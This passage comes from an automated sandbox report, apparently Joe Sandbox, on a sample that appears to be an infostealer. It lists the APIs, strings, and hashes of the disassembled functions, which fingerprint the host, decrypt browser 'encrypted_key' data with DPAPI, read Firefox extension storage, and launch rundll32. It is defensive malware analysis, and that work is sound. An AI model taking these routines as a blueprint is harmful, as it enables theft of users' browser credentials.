                                                                                                                            • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                            • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                            • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                            • API String ID: 2215929589-2108736111
                                                                                                                            • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                            • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                            • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                            • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                            • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                            • String ID: Unknown
                                                                                                                            • API String ID: 2781187439-1654365787
                                                                                                                            • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                            • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                            • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                            • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                            • wsprintfA.USER32 ref: 0041117A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                            • String ID: %d MB
                                                                                                                            • API String ID: 3644086013-2651807785
                                                                                                                            • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                            • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                            • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                            • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CreatePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2024441833-0
                                                                                                                            • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                            • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                            • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                            • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC3C947
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC3C969
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC3C9A9
                                                                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC3C9C8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC3C9E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4191843772-0
                                                                                                                            • Opcode ID: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                            • Instruction ID: 175d23052d95f614c2c2c418b3a936838a6a88b77aec02222b74de90273699f4
                                                                                                                            • Opcode Fuzzy Hash: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                            • Instruction Fuzzy Hash: 45210731B013286BDB05AEA5FC9CBAE73B9BB4A300F51021AF907A7A40FB305C008790
                                                                                                                            APIs
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                            • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                            • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1274457161-0
                                                                                                                            • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                            • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                            • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                            • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3466090806-0
                                                                                                                            • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                            • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                            • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                            • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                            Strings
                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                            • API String ID: 2929475105-2812842227
                                                                                                                            • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                            • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                            • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                            • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                            • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3_catchlstrlen
                                                                                                                            • String ID: ERROR
                                                                                                                            • API String ID: 591506033-2861137601
                                                                                                                            • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                            • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                            • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                            • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                            • String ID: =A
                                                                                                                            • API String ID: 3183270410-2399317284
                                                                                                                            • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                            • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                            • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                            • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 211194620-0
                                                                                                                            • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                            • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                            • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                            • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                            • API String ID: 161838763-3310892237
                                                                                                                            • Opcode ID: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
                                                                                                                            • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                            • Opcode Fuzzy Hash: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
                                                                                                                            • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                              • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                              • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                              • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                              • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                              • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                              • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                            • String ID: $"encrypted_key":"$DPAPI
                                                                                                                            • API String ID: 2311102621-738592651
                                                                                                                            • Opcode ID: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
                                                                                                                            • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                            • Opcode Fuzzy Hash: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
                                                                                                                            • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                              • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                              • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                              • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                              • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                              • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                              • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                              • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                              • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                              • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
